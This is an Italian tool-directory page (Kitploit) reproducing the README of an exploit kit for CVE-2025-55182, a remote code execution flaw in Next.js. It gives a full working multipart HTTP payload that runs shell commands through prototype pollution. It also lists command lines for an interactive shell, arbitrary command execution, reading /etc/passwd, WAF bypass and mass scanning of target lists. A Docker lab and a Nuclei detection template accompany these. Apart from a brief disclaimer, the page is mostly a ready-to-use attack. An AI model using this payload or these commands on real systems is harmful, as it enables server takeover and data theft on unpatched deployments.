Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
react2shell-exploit — React2Shell-Exploit — Framework di sfruttamento completo per CVE-2025-55182, che include exploit in Python, laboratorio vulnerabile in Docker, sfruttamento manuale e automatizzato con Burp Suite, template di rilevamento Nuclei e flusso di lavoro di test validato. Sviluppato per test di penetrazione e ricerca educativa. | Kitploit
Strumenti/GitHubGitHub/rubensuxo-eh/react2shell-exploit
Scanner di VulnerabilitàFramework di ExploitSfruttamento di Applicazioni WebBypass WAFPenetration TestingCommand and ControlApprendimento e FormazioneSviluppo PayloadLab e Pratica

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHubrubensuxo-eh/react2shell-exploit

react2shell-exploit

Vedi Repository
418 mesi faNon ancora revisionato

Informazioni

React2Shell-Exploit — Framework di sfruttamento completo per CVE-2025-55182, che include exploit in Python, laboratorio vulnerabile in Docker, sfruttamento manuale e automatizzato con Burp Suite, template di rilevamento Nuclei e flusso di lavoro di test validato. Sviluppato per test di penetrazione e ricerca educativa.

Condividi

🐺 React2Shell-Exploit-Kensei

CVE-2025-55182 - Next.js RCE Remote Code Execution

Framework di exploit + lab vulnerabile + validazione con Burp Suite e Nuclei.

Framework di sfruttamento completo e ambiente di laboratorio vulnerabile per ricerca sulla sicurezza e test di penetrazione.

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║              🐺 React2Shell-Exploit-Kensei 🐺                 ║
║              CVE-2025-55182 Exploitation Tool                 ║
║                                                               ║
║  Author: Ruben Suxo - Ethical Hacker (kensei)    v2.5.0      ║
╚═══════════════════════════════════════════════════════════════╝

🎯 Panoramica

React2Shell-Exploit-Kensei è un kit di strumenti completo per sfruttare CVE-2025-55182, una vulnerabilità critica di esecuzione remota di codice nelle applicazioni Next.js.

Include:

  • 🐍 Python exploit (modalità automatica + manuale)
  • 🐳 Lab vulnerabile Docker (Next.js 16.0.6)
  • 🔥 Template di sfruttamento Burp Suite
  • 🚨 Template di rilevamento Nuclei
  • 🧪 Casi di test validati

Versioni interessate:

  • Next.js < 16.0.7
  • React 19.0.0

Punteggio CVSS: 10.0 (Critico)

✨ Funzionalità

🔨 Sfruttamento

✅ Sfruttamento automatico
✅ Shell interattiva
✅ Esecuzione di comandi
✅ Lettura di file
✅ Bypass WAF
✅ Scansione batch

🧪 Ambiente di laboratorio Docker - Prerequisiti di installazione

Devi avere Docker installato per eseguire il lab vulnerabile.

PiattaformaLink di installazione
Windowshttps://docs.docker.com/desktop/install/windows/
macOShttps://docs.docker.com/desktop/install/mac-install/
Linux

Verifica dell'installazione:

root@kitploit:~
docker --version

📖 Documentazione

✅ Guida a Burp Suite
✅ Template Nuclei
✅ Esempi completi


🚀 Avvio rapido

root@kitploit:~
# 1. Clone
git clone react2shell-exploit
cd react2shell-exploit
chmod +x react2shell-exploit.py

# 2. Start Lab
cd docker
docker build --no-cache -t react2shell-lab .
docker run -d -p 3002:3002 --name react2shell-lab react2shell-lab

# 3. Exploit
python3 react2shell-exploit.py --url http://localhost:3002 --cmd "whoami"

💻 Esempi di utilizzo

Scansione

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --scan

Esecuzione di comando

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "id"

Shell interattiva

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --shell

Leggi file

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --read /etc/passwd

Bypass WAF

root@kitploit:~
python3 react2shell-exploit.py --url http://target.com --cmd "whoami" --waf-bypass

Scansione batch

root@kitploit:~
python3 react2shell-exploit.py --list targets.txt --scan --threads 20

🔍 Sfruttamento manuale

Burp Suite

Verificato funzionante - Template di richiesta:

root@kitploit:~
POST / HTTP/1.1
Host: target.com:3002
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
Content-Length: 734

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('whoami',{timeout:30000}).toString().trim();throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/exploit?out=${encodeURIComponent(res)};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Risposta attesa:

root@kitploit:~
"children":["__PAGE__?{\"out\":\"root\"}",{}]

Test manuale di WHOAMI: Mio screenshot

Test manuale di IFCONFIG: Mio screenshot

Metodi alternativi di rilevamento automatico:

  • ✅ Estensione Extensibility Helper:
    1. Vai su Extensions:
    2. Installa "Extensibility Helper" e vai ad essa

Mio screenshot

  1. Vai su "Bambda Store"
  2. Cerca "CVE-2025-55182,CVE-2025-66478 - React2Shell"

Mio screenshot

  1. fai clic su "import"

Mio screenshot

  1. Esegui "Audit Selected Items"

Mio screenshot

Mio screenshot

Mio screenshot

  1. Verifica nella scheda personalizzata che "CVE-2025-55182,CVE-2025-66478 - React2Shell" sia selezionato Mio screenshot
  • ✅ ActiveScan++: Rilevamento automatico

Mio screenshot

Nuclei

Verificato funzionante:

root@kitploit:~
nuclei -target http://target.com:3002 -t nuclei/CVE-2025-55182.yaml

Output:

root@kitploit:~
[CVE-2025-55182] [http] [critical] http://target.com:3002/

Mio screenshot

🐺 Crediti

Autore: Ruben Suxo - Ethical Hacker (kensei)
Versione: 2.5.0
Data: 2025-12-06

Ricerca e ispirazione

Questo progetto si basa su ricerca e tecniche provenienti da:

  • assetnote/react2shell-scanner - Implementazione dello scanner
  • freeqaz/react2shell - Tecniche di sfruttamento
  • whiteov3rflow/CVE-2025-55182-poc - Prova di concetto

Scoperta della vulnerabilità

  • Lachlan Davidson (@lachlan2k) - Scoperta originale di CVE-2025-55182

⚠️ Disclaimer legale

Solo per test di sicurezza autorizzati.

L'accesso non autorizzato è illegale. Utilizza solo su sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test.


📄 Licenza

MIT License


🐺 Hack The Planet - Responsabilmente

Solo a scopo educativo. Usa in modo etico.

Scarica lo strumento
https://docs.docker.com/engine/install/